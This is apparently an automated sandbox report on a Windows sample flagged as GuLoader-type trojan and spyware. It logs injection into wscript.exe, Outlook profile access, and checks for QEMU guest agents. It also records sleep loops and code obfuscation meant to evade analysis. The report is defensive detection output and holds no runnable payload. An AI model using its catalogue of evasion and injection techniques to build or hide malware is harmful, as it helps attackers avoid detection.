Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00609D00 9_2_00609D00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00602D89 9_2_00602D89
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061FD8C 9_2_0061FD8C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00602D90 9_2_00602D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00602FB0 9_2_00602FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 04A1B910 appears 268 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 04AAEF10 appears 105 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 04A9E692 appears 86 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 04A77BE4 appears 96 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 04A65050 appears 36 times
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: String function: 1D897BE4 appears 95 times
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: String function: 1D8CEF10 appears 100 times
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: String function: 1D83B910 appears 268 times
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: String function: 1D8BE692 appears 83 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D5ECA NtResumeThread, 2_2_032D5ECA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D4D36 LdrLoadDll,NtProtectVirtualMemory, 2_2_032D4D36
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882DA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_1D882DA0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_1D882DC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882D10 NtQuerySystemInformation,LdrInitializeThunk, 6_2_1D882D10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882CF0 NtDelayExecution,LdrInitializeThunk, 6_2_1D882CF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882C30 NtMapViewOfSection,LdrInitializeThunk, 6_2_1D882C30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882C50 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_1D882C50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882F00 NtCreateFile,LdrInitializeThunk, 6_2_1D882F00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882EB0 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_1D882EB0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882ED0 NtResumeThread,LdrInitializeThunk, 6_2_1D882ED0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882E50 NtCreateSection,LdrInitializeThunk, 6_2_1D882E50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8829F0 NtReadFile,LdrInitializeThunk, 6_2_1D8829F0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882B90 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_1D882B90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882BC0 NtQueryInformationToken,LdrInitializeThunk, 6_2_1D882BC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882B10 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_1D882B10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8834E0 NtCreateMutant,LdrInitializeThunk, 6_2_1D8834E0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882D50 NtWriteVirtualMemory, 6_2_1D882D50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D883C90 NtOpenThread, 6_2_1D883C90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882CD0 NtEnumerateKey, 6_2_1D882CD0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882C10 NtOpenProcess, 6_2_1D882C10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882C20 NtSetInformationFile, 6_2_1D882C20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D883C30 NtOpenProcessToken, 6_2_1D883C30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882FB0 NtSetValueKey, 6_2_1D882FB0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882F30 NtOpenDirectoryObject, 6_2_1D882F30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882E80 NtCreateProcessEx, 6_2_1D882E80
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882EC0 NtQuerySection, 6_2_1D882EC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882E00 NtQueueApcThread, 6_2_1D882E00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8829D0 NtWaitForSingleObject, 6_2_1D8829D0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8838D0 NtGetContextThread, 6_2_1D8838D0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882B80 NtCreateKey, 6_2_1D882B80
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882BE0 NtQueryVirtualMemory, 6_2_1D882BE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882B00 NtQueryValueKey, 6_2_1D882B00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882B20 NtQueryInformationProcess, 6_2_1D882B20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882A80 NtClose, 6_2_1D882A80
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882AA0 NtQueryInformationFile, 6_2_1D882AA0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882AC0 NtEnumerateValueKey, 6_2_1D882AC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D882A10 NtWriteFile, 6_2_1D882A10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D884570 NtSuspendThread, 6_2_1D884570
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A634E0 NtCreateMutant,LdrInitializeThunk, 9_2_04A634E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62CF0 NtDelayExecution,LdrInitializeThunk, 9_2_04A62CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62C30 NtMapViewOfSection,LdrInitializeThunk, 9_2_04A62C30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_04A62DC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62D10 NtQuerySystemInformation,LdrInitializeThunk, 9_2_04A62D10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62E50 NtCreateSection,LdrInitializeThunk, 9_2_04A62E50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62F00 NtCreateFile,LdrInitializeThunk, 9_2_04A62F00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A629F0 NtReadFile,LdrInitializeThunk, 9_2_04A629F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62A80 NtClose,LdrInitializeThunk, 9_2_04A62A80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62AC0 NtEnumerateValueKey,LdrInitializeThunk, 9_2_04A62AC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62A10 NtWriteFile,LdrInitializeThunk, 9_2_04A62A10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62B80 NtCreateKey,LdrInitializeThunk, 9_2_04A62B80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62B90 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_04A62B90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62BC0 NtQueryInformationToken,LdrInitializeThunk, 9_2_04A62BC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62B00 NtQueryValueKey,LdrInitializeThunk, 9_2_04A62B00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62B10 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_04A62B10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A64570 NtSuspendThread, 9_2_04A64570
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A64260 NtSetContextThread, 9_2_04A64260
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A63C90 NtOpenThread, 9_2_04A63C90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62CD0 NtEnumerateKey, 9_2_04A62CD0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62C20 NtSetInformationFile, 9_2_04A62C20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A63C30 NtOpenProcessToken, 9_2_04A63C30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62C10 NtOpenProcess, 9_2_04A62C10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62C50 NtUnmapViewOfSection, 9_2_04A62C50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62DA0 NtReadVirtualMemory, 9_2_04A62DA0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62D50 NtWriteVirtualMemory, 9_2_04A62D50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62EB0 NtProtectVirtualMemory, 9_2_04A62EB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62E80 NtCreateProcessEx, 9_2_04A62E80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62EC0 NtQuerySection, 9_2_04A62EC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62ED0 NtResumeThread, 9_2_04A62ED0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62E00 NtQueueApcThread, 9_2_04A62E00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62FB0 NtSetValueKey, 9_2_04A62FB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62F30 NtOpenDirectoryObject, 9_2_04A62F30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A638D0 NtGetContextThread, 9_2_04A638D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A629D0 NtWaitForSingleObject, 9_2_04A629D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62AA0 NtQueryInformationFile, 9_2_04A62AA0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62BE0 NtQueryVirtualMemory, 9_2_04A62BE0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A62B20 NtQueryInformationProcess, 9_2_04A62B20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C750 NtCreateFile, 9_2_0061C750
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C850 NtDeleteFile, 9_2_0061C850
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C800 NtReadFile, 9_2_0061C800
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C880 NtClose, 9_2_0061C880
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C930 NtAllocateVirtualMemory, 9_2_0061C930
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C74A NtCreateFile, 9_2_0061C74A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C87F NtClose, 9_2_0061C87F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C84B NtDeleteFile, 9_2_0061C84B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061C92A NtAllocateVirtualMemory, 9_2_0061C92A
Sample file is different than original file name gathered from version info
Source: Lakeringernes (1).exe, 00000006.00000002.2316949720.000000001D5D0000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs Lakeringernes (1).exe
Source: Lakeringernes (1).exe, 00000006.00000002.2321426845.000000001DAE0000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Lakeringernes (1).exe
Source: Lakeringernes (1).exe, 00000006.00000003.2293070467.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs Lakeringernes (1).exe
Source: Lakeringernes (1).exe, 00000006.00000003.2189584160.000000001D5D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Lakeringernes (1).exe
Source: Lakeringernes (1).exe, 00000006.00000002.2319202200.000000001D93D000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Lakeringernes (1).exe
Source: Lakeringernes (1).exe, 00000006.00000003.2295201513.000000001D4F4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs Lakeringernes (1).exe
Source: Lakeringernes (1).exe, 00000006.00000003.2195223627.000000001D78C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Lakeringernes (1).exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edgegdi.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: Lakeringernes (1).exe Static PE information: invalid certificate
Source: Lakeringernes (1).exe Virustotal: Detection: 34%
Source: Lakeringernes (1).exe ReversingLabs: Detection: 76%
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File read: C:\Users\user\Desktop\Lakeringernes (1).exe Jump to behavior
Source: Lakeringernes (1).exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Lakeringernes (1).exe C:\Users\user\Desktop\Lakeringernes (1).exe
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process created: C:\Users\user\Desktop\Lakeringernes (1).exe C:\Users\user\Desktop\Lakeringernes (1).exe
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process created: C:\Users\user\Desktop\Lakeringernes (1).exe C:\Users\user\Desktop\Lakeringernes (1).exe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_004030D9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File created: C:\Users\user\AppData\Local\Temp\nskC816.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/6@20/16
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_0040205E CoCreateInstance,MultiByteToWideChar, 2_2_0040205E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 2_2_0040431C
Source: 752cuCH8.9.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File written: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Graviton\Kvle\Materialiseringerne\Antenneanlgget\Custom3.ini Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Strikketjet Jump to behavior
Source: Lakeringernes (1).exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wscript.pdbGCTL source: Lakeringernes (1).exe, 00000006.00000002.2316949720.000000001D5D0000.00000040.10000000.00040000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2293070467.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2295201513.000000001D4F4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Lakeringernes (1).exe, 00000006.00000001.1985708428.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: Lakeringernes (1).exe, 00000006.00000003.2193655224.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2188097468.000000001D4AE000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2317196924.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2319202200.000000001D93D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2302177335.0000000004848000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6800398259.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6803662439.0000000004B1D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2297441570.000000000469D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Lakeringernes (1).exe, Lakeringernes (1).exe, 00000006.00000003.2193655224.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2188097468.000000001D4AE000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2317196924.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2319202200.000000001D93D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000009.00000003.2302177335.0000000004848000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6800398259.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6803662439.0000000004B1D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2297441570.000000000469D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wscript.pdb source: Lakeringernes (1).exe, 00000006.00000002.2316949720.000000001D5D0000.00000040.10000000.00040000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2293070467.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2295201513.000000001D4F4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Lakeringernes (1).exe, 00000006.00000001.1985708428.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source: Binary string: firefox.pdb source: wscript.exe, 00000009.00000003.3009393083.0000000007F38000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.2210407570.0000000000624000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2211562362.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.1983965227.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_10002D20 push eax; ret 2_2_10002D4E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032BAF4F push ecx; ret 2_2_032BAF56
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B53BC push eax; iretd 2_2_032B53BD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D07E4 push FFFFFFABh; ret 2_2_032D07ED
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B77F9 push ecx; ret 2_2_032B77FA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B6A4F push ebp; retf 2_2_032B6A50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032CDE94 pushfd ; iretd 2_2_032CDF23
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B56CD push edx; ret 2_2_032B56DC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032BADDF push ds; iretd 2_2_032BADE1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B2CF0 push eax; iretd 2_2_032B2CF1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8408CD push ecx; mov dword ptr [esp], ecx 6_2_1D8408D6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_049F97A1 push es; iretd 9_2_049F97A8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_049F21AD pushad ; retf 0004h 9_2_049F223F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A208CD push ecx; mov dword ptr [esp], ecx 9_2_04A208D6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061905F pushad ; ret 9_2_00619071
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061847A push ss; ret 9_2_00618490
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00618715 pushfd ; ret 9_2_00618718
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061F945 push eax; ret 9_2_0061F998
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061F9FC push eax; ret 9_2_0061FA02
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061F992 push eax; ret 9_2_0061F998
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0061F99B push eax; ret 9_2_0061FA02
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00619AC5 push 8791A9F6h; retf 9_2_00619AD4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00603BE1 push esp; iretd 9_2_00603BF3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00620C04 push ebx; iretd 9_2_00620C05
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 2_2_10001A5D
Drops PE files
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File created: C:\Users\user\AppData\Local\Temp\nsbCBD1.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\wscript.exe TID: 6480 Thread sleep count: 105 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 6480 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 8136 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 8136 Thread sleep count: 44 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 8136 Thread sleep time: -44000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 8136 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 8136 Thread sleep time: -63000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B072C rdtsc 2_2_032B072C
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Lakeringernes (1).exe API coverage: 1.0 %
Source: C:\Windows\SysWOW64\wscript.exe API coverage: 2.9 %
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_00405FFD FindFirstFileA,FindClose, 2_2_00405FFD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 2_2_0040559B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_00402688 FindFirstFileA, 2_2_00402688
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00612C70 FindFirstFileW,FindNextFileW,FindClose, 9_2_00612C70
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00612C6A FindFirstFileW,FindNextFileW,FindClose, 9_2_00612C6A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Lakeringernes (1).exe API call chain: ExitProcess graph end node
Source: Lakeringernes (1).exe, 00000002.00000002.2212149150.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
